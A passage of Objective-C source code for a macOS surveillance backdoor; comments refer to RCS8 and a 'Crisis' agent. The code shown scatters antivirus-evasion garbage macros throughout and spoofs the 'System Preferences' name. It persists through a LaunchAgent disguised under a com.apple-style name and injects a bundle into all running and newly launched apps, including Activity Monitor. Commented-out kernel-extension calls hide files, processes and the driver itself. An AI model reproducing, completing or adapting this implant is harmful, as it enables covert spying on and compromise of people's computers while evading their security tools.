        sym.hash    = io_recursive_lock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    munmap(imageBase, filesize);
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    close(kernFD);
}

//
// Code stolen from pmconfigd
// http://www.opensource.apple.com/source/PowerManagement/PowerManagement-137/pmconfigd/pmconfigd.c
// Looks like it's undocumented
//
- (void)_registerForShutdownNotifications
{
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    NSAutoreleasePool *outerPool = [[NSAutoreleasePool alloc] init];
    
#ifdef DEBUG_CORE
    infoLog(@"Initializing shutdown notifications");
#endif
    
    CFMachPortRef       gNotifyMachPort     = NULL;
    CFRunLoopSourceRef  gNotifyMachPortRLS  = NULL;
    mach_port_t         our_port            = MACH_PORT_NULL;
    int                 notify_return       = NOTIFY_STATUS_OK;
    
    // Tell the kernel that we are NOT shutting down at the moment, since
    // configd is just launching now.
    // Why: if configd crashed with "System Shutdown" == kCFbooleanTrue, reset
    // it now as the situation may no longer apply.
    //_setRootDomainProperty(CFSTR("System Shutdown"), kCFBooleanFalse);
    
    if ([gUtil isLeopard])
    {
#ifdef DEBUG_CORE
        infoLog(@"Registering notifications for Leopard");
#endif
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        notify_return = notify_register_mach_port(kLLWShutdowntInitiated,
                                                  &our_port,
                                                  0, /* flags */
                                                  &gLWShutdownNotificationToken);
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        notify_return = notify_register_mach_port(kLLWRestartInitiated,
                                                  &our_port,
                                                  NOTIFY_REUSE, /* flags */
                                                  &gLWRestartNotificationToken);
        
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        notify_return = notify_register_mach_port(kLLWLogoutCancelled,
                                                  &our_port,
                                                  NOTIFY_REUSE, /* flags */
                                                  &gLWLogoutCancelNotificationToken);
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        notify_return = notify_register_mach_port(kLLWLogoutPointOfNoReturn,
                                                  &our_port,
                                                  NOTIFY_REUSE, /* flags */
                                                  &gLWLogoutPointOfNoReturnNotificationToken);
    }
    else
    {
#ifdef DEBUG_CORE
        infoLog(@"Registering notifications for Snow Leopard");
#endif
        notify_return = notify_register_mach_port(kSLLWShutdowntInitiated,
                                                  &our_port,
                                                  0, /* flags */
                                                  &gLWShutdownNotificationToken);
        
        // AV evasion: only on release build
        AV_GARBAGE_006
        
        notify_return = notify_register_mach_port(kSLLWRestartInitiated,
                                                  &our_port,
                                                  NOTIFY_REUSE, /* flags */
                                                  &gLWRestartNotificationToken);
        
        notify_return = notify_register_mach_port(kSLLWLogoutCancelled,
                                                  &our_port,
                                                  NOTIFY_REUSE, /* flags */
                                                  &gLWLogoutCancelNotificationToken);
        
        // AV evasion: only on release build
        AV_GARBAGE_007
        
        notify_return = notify_register_mach_port(kSLLWLogoutPointOfNoReturn,
                                                  &our_port,
                                                  NOTIFY_REUSE, /* flags */
                                                  &gLWLogoutPointOfNoReturnNotificationToken);
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    gNotifyMachPort = CFMachPortCreateWithPort(kCFAllocatorDefault,
                                               our_port,
                                               computerWillShutdown,
                                               NULL,  /* context */
                                               NULL); /* &shouldFreeInfo */
    if (!gNotifyMachPort)
        return;
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    // Create RLS for mach port
    gNotifyMachPortRLS = CFMachPortCreateRunLoopSource(kCFAllocatorDefault,
                                                       gNotifyMachPort,
                                                       0); /* order */
    if (!gNotifyMachPortRLS)
        return;
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    CFRunLoopAddSource(CFRunLoopGetCurrent(),
                       gNotifyMachPortRLS,
                       kCFRunLoopDefaultMode);
    
    CFRunLoopRun();
    
    [outerPool release];
}

@end

#pragma mark -
#pragma mark Public Implementation
#pragma mark -

@implementation __m_MCore

@synthesize mBinaryName;
@synthesize mApplicationName;
@synthesize mSpoofedName;
@synthesize mMainLoopControlFlag;

- (id)init
{
    self = [super init];
    
    if (self != nil)
    {
        // init instance variables
        [self setMApplicationName: [[[NSBundle mainBundle] executablePath] lastPathComponent]];
        [self setMBinaryName: [[[NSBundle mainBundle] executablePath] lastPathComponent]];
        
        [self setMSpoofedName: [[[[NSBundle mainBundle] executablePath]
                                 stringByDeletingLastPathComponent]
                                stringByAppendingPathComponent: @"System Preferences"]];
        
        // Let's guess all the required names
        [self _guessNames];
        NSString *kext32Path    = [[NSString alloc] initWithFormat:
                                   @"%@/%@/%@.kext",
                                   [[NSBundle mainBundle] bundlePath],
                                   @"Contents/Resources",
                                   gKext32Name];
        NSString *kext64Path    = [[NSString alloc] initWithFormat:
                                   @"%@/%@/%@.kext",
                                   [[NSBundle mainBundle] bundlePath],
                                   @"Contents/Resources",
                                   gKext64Name];
        NSString *loaderPath  = [[NSString alloc] initWithFormat:
                                 @"%@/%@",
                                 [[NSBundle mainBundle] bundlePath],
                                 @"abla"];
        NSString *flagPath    = [[NSString alloc] initWithFormat:
                                 @"%@/%@",
                                 [[NSBundle mainBundle] bundlePath],
                                 @"mdworker.flg"];
        
        // init gUtil instance variables
        [gUtil setMBackdoorPath: [[NSBundle mainBundle] bundlePath]];
        [gUtil setMKext32Path: kext32Path];
        [gUtil setMKext64Path: kext64Path];
        [gUtil setMSLIPlistPath: SLI_PLIST];
        [gUtil setMServiceLoaderPath: loaderPath];
        [gUtil setMExecFlag: flagPath];
        
        // Allocate global locks
        gControlFlagLock = [[NSLock alloc] init];
        gSuidLock        = [[NSLock alloc] init];
        
        [kext32Path release];
        [kext64Path release];
        [loaderPath release];
        [flagPath release];
    }
    
    return self;
}

- (void)dealloc
{
    // TODO: Shared Memory deallocation
    [mMainLoopControlFlag release];
    
    if (mBinaryName != nil)
        [mBinaryName release];
    
    if (mApplicationName != nil)
        [mApplicationName release];
    
    if (mSpoofedName != nil)
        [mSpoofedName release];
    
    if (mMainLoopControlFlag != nil)
        [mMainLoopControlFlag release];
    
    // close kext device
    if (gBackdoorFD != 0)
    {
        close(gBackdoorFD);
    }
    
    [super dealloc];
}

- (int)connectKext
{
    // AV evasion: only on release build
    AV_GARBAGE_005
    
#ifdef DEBUG_CORE
    infoLog(@"Initializing backdoor with kext");
#endif
    
    gBackdoorFD = open(BDOR_DEVICE, O_RDWR);
    
    if (gBackdoorFD != -1)
    {
        int ret;//, bID;
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        ret = ioctl(gBackdoorFD, MCHOOK_INIT, [NSUserName() UTF8String]);
        
        if (ret < 0)
        {
#ifdef DEBUG_CORE
            errorLog(@"Error while initializing the uspace-kspace "\
                     "communication channel");
#endif
            
            return -1;
        }
        else
        {
#ifdef DEBUG_CORE
            infoLog(@"Backdoor initialized correctly");
#endif
        }
    }
    else
    {
#ifdef DEBUG_CORE
        errorLog(@"Error while opening the KEXT dev entry!");
#endif
        
        return -1;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    return 0;
}

- (BOOL)isInjectable:(NSString*)appName
{
    int i = 0;
    
    if (appName == nil &&
        ![appName isKindOfClass: [NSString class]])
        return TRUE;
    
    while (appBListArray[i] != NULL)
    {
        if ([appName compare: appBListArray[i]] == NSOrderedSame)
            return FALSE;
        i++;
    }
    
    return TRUE;
}

- (void)sendEventToPid: (NSNumber *)thePid
{
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    AEEventID eventID = 'open';
    int eUid = geteuid();
    int rUid = getuid();
    int maxRetry = 10;
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    if (thePid == nil)
        return;
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_004
    
    // On lion fork to sendEvents without problem
    if ([gUtil isLion] == YES || [gUtil isMtLion] == YES)
    {
        NSTask *aTask = [[NSTask alloc] init];
        NSMutableArray *args = [NSMutableArray array];
        NSString *pidStr = [[NSString alloc] initWithFormat: @"%d", [thePid intValue]];
        
        //argv
        [args addObject: @"-p"];
        [args addObject: pidStr];
        [aTask setLaunchPath: [[NSBundle mainBundle] executablePath]];
        [aTask setArguments:args];
        
#ifdef DEBUG_CORE
        verboseLog(@"Running task with args %@", args);
#endif
        
        [aTask launch];
        [aTask release];
        [pidStr release];
        
#ifdef DEBUG_CORE
        verboseLog(@"task launched");
#endif
        return;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    __m_MTaskManager *_taskManager = [__m_MTaskManager sharedInstance];
    
    [gControlFlagLock lock];
    NSString *localFlag = [_taskManager getControlFlag];
    [gControlFlagLock unlock];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    if ([localFlag isEqualToString: @"STOP"])
    {
        return;
    }
    
    pid_t pidP = (pid_t) [thePid intValue];
    
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    SBApplication *app = [SBApplication applicationWithProcessIdentifier: pidP];
    
#ifdef DEBUG_CORE
    verboseLog(@"send event to application pid %d", pidP);
#endif
    
    [gSuidLock lock];
    
#ifdef DEBUG_CORE
    verboseLog(@"enter critical session [euid/uid %d/%d]",
               geteuid(), getuid());
#endif
    
    // trimming process u&g
    if (eUid != rUid)
        seteuid(rUid);
    
    [app setTimeout: 1];
    [app setSendMode: kAENoReply | kAENeverInteract | kAEDontRecord];
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    [app sendEvent: kASAppleScriptSuite
                id: kGetAEUT
        parameters: 0];
    
    sleep(1);
    
    
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    NSNumber *pid = [NSNumber numberWithInt: getpid()];
    
    [app setTimeout: 1];
    [app setSendMode: kAENoReply | kAENeverInteract | kAEDontRecord];
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    id injectReply = [app sendEvent: 'OPNe'
                                 id: eventID
                         parameters: 'pido', pid, 0];
    
    // Check if the seteuid do the correct work...
    while ((geteuid() != eUid) && maxRetry--)
    {
        // AV evasion: only on release build
        AV_GARBAGE_000
        
        // original u&g
        if (seteuid(eUid) == -1)
        {
#ifdef DEBUG_CORE
            infoLog(@"setting euid error [%d]",
                    errno);
#endif
        }
        
        usleep(500);
    }
    
    [gSuidLock unlock];
    
#ifdef DEBUG_CORE
    verboseLog(@"exit critical session [euid/uid %d/%d]",
               geteuid(), getuid());
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    if (injectReply != nil)
    {
#ifdef DEBUG_CORE
        warnLog(@"unexpected injectReply: %@", injectReply);
#endif
    }
    else
    {
#ifdef DEBUG_CORE
        verboseLog(@"injection done");
#endif
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    [pool release];
}

- (void)injectRunningApp
{
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    NSWorkspace *ws = [NSWorkspace sharedWorkspace];
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    NSArray *apps = [ws runningApplications];
    
    if (apps && [apps count])
    {
        for (int i=0; i<[apps count]; i++)
        {
            NSRunningApplication *app = (NSRunningApplication*) [apps objectAtIndex:i];
            
            if ([self isInjectable:[app localizedName]] == FALSE)
                continue;
            
            // AV evasion: only on release build
            AV_GARBAGE_006
            
            pid_t tmpPid = [app processIdentifier];
            
            // AV evasion: only on release build
            AV_GARBAGE_001
            
            NSNumber *thePid = [[NSNumber alloc] initWithInt: tmpPid];
            
            // AV evasion: only on release build
            AV_GARBAGE_002
            
#ifdef DEBUG_CORE_
            infoLog(@"%s: Injecting app %@ [%d]", __FUNCTION__,
                    [app localizedName], [app processIdentifier]);
#endif
            
            // AV evasion: only on release build
            AV_GARBAGE_001
            
            [self sendEventToPid:thePid];
            
            [thePid release];
            
            usleep(500);
        }
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    [pool release];
}

- (void)checkAndRunDemoMode
{
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    NSString *appName = [[[NSBundle mainBundle] executablePath] lastPathComponent];
    
    // FIXED- demo mode
    if ([appName isEqualToString: @"System Preferences"] == FALSE)
    {
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        // precalc sha1 of "hxVtdxJ/Z8LvK3ULSnKRUmLE
        //char demoSha1[] = "\x31\xa2\x85\xaf\xb0\x43\xe7\xa0\x90\x49"
        //                  "\x94\xe1\x70\x07\xc8\x26\x3d\x45\x42\x73";
        char demoSha1[] =   "\x4e\xb8\x75\x0e\xa8\x10\xd1\x94\xb4\x69"
        "\xf0\xaf\xa8\xf4\x77\x51\x49\x69\xba\x72";
        
        NSMutableData *isDemoMarker = [[NSMutableData alloc] initWithBytes: demoSha1 length: 20];
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        NSMutableData *demoMode = [[NSMutableData alloc] initWithBytes: gDemoMarker length: 24];
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        NSMutableData *currDemoMode = [demoMode sha1Hash];
        
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        if ([currDemoMode isEqualToData: isDemoMarker] == TRUE)
        {
            NSString *filePath = [[NSString alloc] initWithFormat: @"%@/%@",
                                  [[NSBundle mainBundle] bundlePath],
                                  @"infected.bmp"];
            
            // AV evasion: only on release build
            AV_GARBAGE_007
            
            changeDesktopBg(filePath, NO);
            
            gIsDemoMode = YES;
            
            [filePath release];
        }
    }
}

- (BOOL)makeBackdoorResident
{
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    NSString *backdoorDaemonName = [NSString stringWithFormat:@"%@.%@.%@",
                                    DOMAIN_COM,
                                    DOMAIN_APL,
                                    LAUNCHD_NAME];
    
    return [gUtil createLaunchAgentPlist:backdoorDaemonName
                               forBinary:gBackdoorName];
}

- (BOOL)amIResident
{
    // for upgrade from old version
    removeOldLd();
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    NSString *backdoorPlist = createLaunchdPlistPath();
    
    // AV evasion: only on release build
    AV_GARBAGE_004
    
    if ([[NSFileManager defaultManager] fileExistsAtPath: backdoorPlist
                                             isDirectory: NULL])
    {
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        return YES;
    }
    else
    {
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        return NO;
    }
}

- (BOOL)shouldUpgradeComponents
{
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    NSString *migrationConfig = [[NSString alloc] initWithFormat: @"%@/%@",
                                 [[NSBundle mainBundle] bundlePath],
                                 RCS8_MIGRATION_CONFIG];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    if ([[NSFileManager defaultManager] fileExistsAtPath: migrationConfig] == TRUE)
    {
        NSString *configurationPath = [[NSString alloc] initWithFormat: @"%@/%@",
                                       [[NSBundle mainBundle] bundlePath],
                                       gConfigurationName];
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        if ([[NSFileManager defaultManager] removeItemAtPath: configurationPath
                                                       error: nil])
        {
            
            // AV evasion: only on release build
            AV_GARBAGE_009
            
            if ([[NSFileManager defaultManager] moveItemAtPath: migrationConfig
                                                        toPath: configurationPath
                                                         error: nil])
            {
                [migrationConfig release];
                [configurationPath release];
                return TRUE;
            }
        }
        
        [configurationPath release];
    }
    
    [migrationConfig release];
    
    NSString *updateDylib = [[NSString alloc] initWithFormat: @"%@/%@",
                             [[NSBundle mainBundle] bundlePath],
                             RCS8_UPDATE_DYLIB];
#ifdef DEBUG_CORE
    infoLog(@"RCS8_UPDATE_DYLIB %@", updateDylib);
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    if ([[NSFileManager defaultManager] fileExistsAtPath: updateDylib] == TRUE)
        
    {
        NSString *dylib = [[NSString alloc] initWithFormat: @"%@/%@",
                           [[NSBundle mainBundle] bundlePath],
                           gInputManagerName];
#ifdef DEBUG_CORE
        infoLog(@"gInputManagerName %@", gInputManagerName);
#endif
        // AV evasion: only on release build
        AV_GARBAGE_000
        
        [[NSFileManager defaultManager] removeItemAtPath:dylib error:nil];
        
        // AV evasion: only on release build
        AV_GARBAGE_000
        
        [[NSFileManager defaultManager] moveItemAtPath: updateDylib
                                                toPath: dylib
                                                 error: nil];
#ifdef DEBUG_CORE
        infoLog(@"updateDylib %@", updateDylib);
#endif
        
        [dylib release];
        
    }
    
    [updateDylib release];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    //
    //  if ([[NSFileManager defaultManager] fileExistsAtPath: RCS8_UPDATE_XPC] == TRUE)
    //    {
    //
    //    }
    
    return TRUE;
}

- (void)saveInstance
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  CFStringRef serialNumber;
  getSystemSerialNumber(&serialNumber);
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSMutableString *_instanceID = [[NSMutableString alloc] initWithString: (NSString *)serialNumber];
  CFRelease(serialNumber);
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSString *userName = NSUserName();
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  [_instanceID appendString: userName];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSData *instanceID = [_instanceID sha1Hash];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  [_instanceID release];
  
  [instanceID writeToFile:INSTANCEID_FILENAME atomically:YES];
  
  [pool release];
  
}

- (BOOL)runMeh
{
    NSAutoreleasePool *innerPool = [[NSAutoreleasePool alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    //BOOL sliSuccess = NO; // J: unused
    //BOOL uiSuccess = NO;  // J: unused
    //BOOL noPrivs = NO;    // J: unused
    
    // Check the preconfigured mode - default is SLIPLIST
#ifdef DEV_MODE
    NSString *workingMode = [[NSString alloc] initWithString: DEV];
#else
    NSString *workingMode = [[NSString alloc] initWithCString: gMode];
#endif
    
    // First of all, calculate properly the shared memory size
    // for logs
    gMemLogMaxSize = sizeof(shMemoryLog) * SHMEM_LOG_MAX_NUM_BLOCKS;
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    // Get OS version
    [[NSApplication sharedApplication] getSystemVersionMajor: &gOSMajor
                                                       minor: &gOSMinor
                                                      bugFix: &gOSBugFix];
    // First off check if we support the OS
    if (gOSMajor != OSMAJOR_VER
        || (gOSMajor == OSMAJOR_VER && gOSMinor < OSMINOR_MIN_VER)
        || (gOSMajor == OSMAJOR_VER && gOSMinor > OSMINOR_MAX_VER))
    {
        return NO;
    }
  
    // save instanceID for offline CD purpose
    [self saveInstance];
  
    resolveQuartzFunc();
  
    // set desktop background for demo mode
    [self checkAndRunDemoMode];
    
    // check if we are running rcs8 for the first time
    // or there are comps ready for upgrade
    [self shouldUpgradeComponents];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    NSString *offlineFlag = [NSString stringWithFormat: @"%@/00",
                             [[NSBundle mainBundle] bundlePath]];
    
    if ([[NSFileManager defaultManager] fileExistsAtPath: offlineFlag])
    {
        // AV evasion: only on release build
        AV_GARBAGE_006
        
        [self makeBackdoorResident];
        [[NSFileManager defaultManager] removeItemAtPath: offlineFlag
                                                   error: nil];
    }
    
    // Resize shared mem if needed, on default installation we need to increase
    // this values
    [self _resizeSharedMemoryWindow];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    // Check it we're the only one on the current user session (1 per user)
    [self _checkForOthers];
    
    /*
     // FIXED-
     if ([workingMode isEqualToString: SLIPLIST])
     {
     // AV evasion: only on release build
     AV_GARBAGE_009
     
     // SLIPLIST set by "require admin privileges" unflagged
     noPrivs = YES;
     NSString *flagPath   = [NSString stringWithFormat: @"%@/%@",
     [[NSBundle mainBundle] bundlePath],
     @"mdworker.flg"];
     
     // AV evasion: only on release build
     AV_GARBAGE_007
     
     if (![[NSFileManager defaultManager] fileExistsAtPath: flagPath
     isDirectory: NO])
     {
     [gUtil dropExecFlag];
     }
     }
     else if ([workingMode isEqualToString: UISPOOF])
     {
     
     // AV evasion: only on release build
     AV_GARBAGE_007
     
     // set by "require admin privileges"
     if  ([gUtil isLion] == YES || [gUtil isMtLion] == YES || [gUtil isMaverics] == YES)
     {
     NSString *flagPath   = [NSString stringWithFormat: @"%@/%@",
     [[NSBundle mainBundle] bundlePath],
     @"mdworker.flg"];
     
     // AV evasion: only on release build
     AV_GARBAGE_000
     
     if (![[NSFileManager defaultManager] fileExistsAtPath: flagPath
     isDirectory: NO])
     {
     [gUtil dropExecFlag];
     }
     
     // AV evasion: only on release build
     AV_GARBAGE_004
     
     // Enable setugid on lion
     if ([gUtil enableSetugidAuth] == NO)
     {
     #ifdef DEBUG_CORE
     errorLog(@"Error while enabling setugid_appkit capability");
     #endif
     }
     }
     else
     {
     // AV evasion: only on release build
     AV_GARBAGE_002
     
     uiSuccess = [self _UISpoof];
     }
     }
     */
    // Create LaunchAgent dir if it doesn't exists yet
    NSString *launchAgentPath = [NSString stringWithFormat: @"/Users/%@/%@/%@",
                                 NSUserName(), LIBRARY_NSSTRING, LAUNCHD_DIR];
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    if ([[NSFileManager defaultManager] fileExistsAtPath: launchAgentPath] == NO)
    {
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        // Factory restored machines don't have this dir
        mkdir([launchAgentPath UTF8String], 0755);
        
        // AV evasion: only on release build
        AV_GARBAGE_008
        
        // Now chown it -> ourself
        NSArray *_tempArguments = [[NSArray alloc] initWithObjects: @"-R",
                                   NSUserName(),
                                   launchAgentPath,
                                   nil];
        
        // AV evasion: only on release build
        AV_GARBAGE_000
        
        [gUtil executeTask: @"/usr/sbin/chown"
             withArguments: _tempArguments
              waitUntilEnd: YES];
        
        // AV evasion: only on release build
        AV_GARBAGE_007
        
        [_tempArguments release];
    }
    
    // Check if the backdoor is already resident
    // otherwise add all the required files for making it resident
    if ([self amIResident] == NO)
    {
      if ([self makeBackdoorResident] == NO)
      {
#ifdef DEBUG_CORE
          errorLog(@"An error occurred");
#endif
      }
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    [workingMode release];
    
    //
    // Create and initialize shared memory
    if ([mApplicationName isEqualToString: @"System Preferences"] == NO)
    {
        if ([self _createAndInitSharedMemory] == NO)
        {
#ifdef DEBUG_CORE
            errorLog(@"Error while creating shared memory");
#endif
            
            // AV evasion: only on release build
            AV_GARBAGE_007
            
            return NO;
        }
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    /*
    //XXX-
    if ([[NSFileManager defaultManager] fileExistsAtPath: [gUtil mExecFlag]
                                             isDirectory: NULL])
    {
        [self _createInternalFilesAndFolders];
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        [self _dropOsaxBundle];
        
        //XXX- for av problem
        //      // Drop xpc services for sandboxed app
        //      if ([gUtil isLion] && (getuid() == 0 || geteuid() == 0))
        //        {
        //          [self _dropXPCBundle];
        //        }
    }
    */
  
    // AV evasion: only on release build
    AV_GARBAGE_006
  
    decryptAndSaveIm();
  
    [self _dropOsaxBundle];
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    [NSThread detachNewThreadSelector: @selector(_registerForShutdownNotifications)
                             toTarget: self
                           withObject: nil];
    
#ifndef NO_KEXT
    //int ret = 0;  //J: unused
    int kextLoaded = 0;
    
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    /*
    if (getuid() != 0 && geteuid() == 0 && [gUtil isSnowLeopard] == YES)
    {
        if ([self connectKext] == -1)
        {
#ifdef DEBUG_CORE
            warnLog(@"connectKext failed, trying to load the KEXT");
#endif
            
            // AV evasion: only on release build
            AV_GARBAGE_000
            
            BOOL res = is64bitKernel();
            if ([gUtil loadKextFor64bit: res] == YES)
            {
#ifdef DEBUG_CORE
                infoLog(@"KEXT loaded successfully");
#endif
                
                if ([self connectKext] != -1)
                {
                    kextLoaded = 1;
                }
                else
                {
#ifdef DEBUG_CORE
                    errorLog(@"Error on KEXT init");
#endif
                }
            }
        }
        else
        {
            kextLoaded = 1;
        }
    }
    */
    kextLoaded = 0;
    // AV evasion: only on release build
    AV_GARBAGE_009
    
//    if (kextLoaded == 1)
//    {
//#ifdef DEBUG_CORE
//        infoLog(@"kext loaded");
//#endif
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_001
//        
//        // Since Snow Leopard doesn't export all the required symbols
//        // we're gonna solve them from uspace and send 'em back to kspace
//        [self _solveKernelSymbolsForKext];
//        
//        os_version_t os_ver;
//        os_ver.major  = gOSMajor;
//        os_ver.minor  = gOSMinor;
//        os_ver.bugfix = gOSBugFix;
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_007
//        
//        // Telling kext to find sysent based on OS version
//        ret = ioctl(gBackdoorFD, MCHOOK_FIND_SYS, &os_ver);
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_007
//        
//        //
//        // Start hiding all the required paths
//        NSString *backdoorPlist = [[NSString alloc] initWithFormat: @"%@.%@.%@.%@",
//                                   DOMAIN_COM, DOMAIN_APL, LAUNCHD_NAME, LAUNCHD_EXT];
//        
//#ifdef DEBUG_CORE
//        infoLog(@"Hiding LaunchAgent plist");
//#endif
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_002
//        
//        // Hiding LaunchAgent plist
//        ret = ioctl(gBackdoorFD, MCHOOK_HIDED, (char *)[backdoorPlist fileSystemRepresentation]);
//        
//        [backdoorPlist release];
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_001
//        
//        // Hide only inputmanager not osax
//        if ([gUtil isLeopard])
//        {
//#ifdef DEBUG_CORE
//            infoLog(@"Hiding InputManager");
//#endif
//            NSString *inputManagerPath = [[NSString alloc]
//                                          initWithString: IM_NAME];
//            
//            // AV evasion: only on release build
//            AV_GARBAGE_004
//            
//            // Hiding input manager dir
//            ret = ioctl(gBackdoorFD, MCHOOK_HIDED, (char *)[inputManagerPath fileSystemRepresentation]);
//            
//            [inputManagerPath release];
//        }
//        else
//        {
//#ifdef DEBUG_CORE
//            //infoLog(@"Hiding OSAX");
//#endif
//            //          NSString *osaxPath = [[NSString alloc] initWithString: EXT_BUNDLE_FOLDER];
//            //          // Hiding input manager dir
//            //          ret = ioctl(gBackdoorFD, MCHOOK_HIDED, (char *)[osaxPath fileSystemRepresentation]);
//            //
//            //          [osaxPath release];
//        }
//        
//        NSString *appPath = [[[NSBundle mainBundle] bundlePath]
//                             lastPathComponent];
//#ifdef DEBUG_CORE
//        infoLog(@"Hiding backdoor dir");
//#endif
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_008
//        
//        // Hiding backdoor dir
//        ret = ioctl(gBackdoorFD, MCHOOK_HIDED, (char *)[appPath fileSystemRepresentation]);
//        
//#ifdef DEBUG_CORE
//        infoLog(@"Hiding process %d", getpid());
//#endif
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_008
//        
//        // Hide Process
//        ret = ioctl(gBackdoorFD, MCHOOK_HIDEP, [NSUserName() UTF8String]);
//        
//#ifdef DEBUG_CORE
//        infoLog(@"Hiding KEXT");
//#endif
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_001
//        
//        // Hide KEXT
//        ret = ioctl(gBackdoorFD, MCHOOK_HIDEK);
//        
//#ifdef DEBUG_CORE
//        infoLog(@"Hiding /dev entry");
//#endif
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_000
//        
//        // Hide KEXT /dev entry
//        NSString *kextDevEntry = [[NSString alloc] initWithCString: BDOR_DEVICE];
//        
//        // AV evasion: only on release build
//        AV_GARBAGE_006
//        
//        ret = ioctl(gBackdoorFD, MCHOOK_HIDED, (char *)[[kextDevEntry lastPathComponent] fileSystemRepresentation]);
//        
//        [kextDevEntry release];
//    }
#endif
    
#ifndef NO_PROC_HIDING
    // Inject running ActivityMonitor
    if ([gUtil isLeopard] == NO && geteuid() == 0)
    {
        
        // AV evasion: only on release build
        AV_GARBAGE_008
        
        NSNumber *pActivityM = pidForProcessName(@"Activity Monitor");
        
        if (pActivityM != nil)
        {
            // AV evasion: only on release build
            AV_GARBAGE_007
            
            NSNumber *thePid = [[NSNumber alloc] initWithInt: [pActivityM intValue]];
            
            // AV evasion: only on release build
            AV_GARBAGE_008
            
            [self sendEventToPid: thePid];
            
            [thePid release];
        }
    }
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    // inject all running apps in the ws
    [self injectRunningApp];
    
#ifdef DEBUG_CORE
    infoLog(@"injectRunningApp done!");
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    // Register notification for new process
    [[[NSWorkspace sharedWorkspace] notificationCenter] addObserver: self
                                                           selector: @selector(injectBundle:)
                                                               name: NSWorkspaceDidLaunchApplicationNotification
                                                             object: nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    // Register notification for terminate process for Crisis agent
    [[[NSWorkspace sharedWorkspace] notificationCenter] addObserver: self
                                                           selector: @selector(willStopCrisis:)
                                                               name: NSWorkspaceDidTerminateApplicationNotification
                                                             object: nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    __m_MLogManager *logManager = [__m_MLogManager sharedInstance];
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    [logManager updateLogQueue];
    
    // AV evasion: only on release build
    AV_GARBAGE_004
    
    __m_MTaskManager *taskManager = [__m_MTaskManager sharedInstance];
    
    // Load configuration, starts all agents and the events monitoring routine
    [taskManager loadInitialConfiguration];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    // Set the backdoorControlFlag to RUNNING
    mMainLoopControlFlag = @"RUNNING";
    
    [gControlFlagLock lock];
